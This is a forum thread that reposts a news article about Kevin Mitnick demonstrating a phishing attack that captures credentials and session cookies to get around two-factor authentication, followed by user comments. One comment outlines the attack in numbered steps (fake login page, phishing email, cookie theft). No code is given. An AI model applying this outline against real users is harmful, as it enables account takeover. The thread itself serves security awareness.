Hacker Kevin Mitnick shows how to bypass 2FA

[tao]

A new exploit allows hackers to spoof two-factor authentication requests by sending a user to a fake login page and then stealing the username, password, and session cookie.

 

KnowBe4 Chief Hacking Officer Kevin Mitnick showed the hack in a public video. By convincing a victim to visit a typo-squatting domain liked “LunkedIn.com” and capturing the login, password, and authentication code, the hacker can pass the credentials to the actual site and capture the session cookie. Once this is done the hacker can login indefinitely. This essentially uses the one time 2FA code as a way to spoof a login and grab data.

 

“A white hat hacker friend of Kevin’s developed a tool to bypass two-factor authentication using social engineering tactics – and it can be weaponized for any site,” said Stu Sjouwerman, KnowBe4 CEO. “Two-factor authentication is intended to be an extra layer of security, but in this instance, we clearly see that you can’t rely on it alone to protect your organization.”

 

White hat hacker Kuba Gretzky created the system, called evilginx, and describes its implementation in a wonderfully thorough post on his site.

 

Sjouwerman notes that anti-phishing education is deeply important and that a hack like this is impossible to complete if the victim is savvy about security and the dangers of clicking links that come into your email box. To demonstrate this, Sjouwerman sent me an email seemingly addressed to me from Matt Burns ([email protected]) talking about a typo in a post. When I clicked on it I was transferred to a SendGrid redirect site and dumped into TechCrunch – but the payload could have been more nefarious.

 

 

“This highlights the need for new-school security awareness training and simulated phishing because people are truly your last line of defense,” said Sjouwerman. He estimates that hackers will begin trying this technique in the next few weeks and urges users and IT managers to harden their security protocols.

 

< Here >

[straycat19]

Quote

This essentially uses the one time 2FA code as a way to spoof a login and grab data.

 

What sites use a one time 2FA code?  Never heard of such an animal.  Every place I use 2FA there is a different code required for every login, even if I would log out and turn around and log back in, I will receive a new 2FA code.  KnowBe4 isn't the best security service around by far, and Kevin Mitnick isn't what anyone would call a real hacker.  He is just an old script kiddie.  Read his original 'hacking exploits' and arrest, that verifies the script kiddie label.

[vitorio]

25 minutes ago, straycat19 said:

Every place I use 2FA there is a different code required for every login, even if I would log out and turn around and log back in, I will receive a new 2FA code

That's also my experience. But the ones with this login are very few according to my experience, so far.

[J.C]

This “bypass” is kinda strange. This is the actual video:

 

 

 

After watching the video one can argue that:

• This is NOT a 2FA bypass (for me, a 2FA bypass would be if the hacker had only the username and password from the user and found a way to login with only that, maybe exploring a race condition, code injection etc)
• This is a MITM plus session hijacking via cookie stealing attack

Basically, what Mitnick did was:

1. Create a fake LinkedIn page and host it somewhere (I believe he used SET, a famous tool for this kind of action);
2. Craft a phishing email with a link to the fake LinkedIn page and send to the target;
3. Wait for the user to click and put his username, password and 2FA PIN. You can see in the video that the fake "Two-Step Verification" page is very similar to LinkedIn's official one;
4. Get target's username, password and session cookie;
5. Use the session cookie to login anywhere;
6. Profit.

IMO, there is nothing new here, just your regular session hijack. Maybe I'm missing something and I'd be happy if someone could point me my mistake.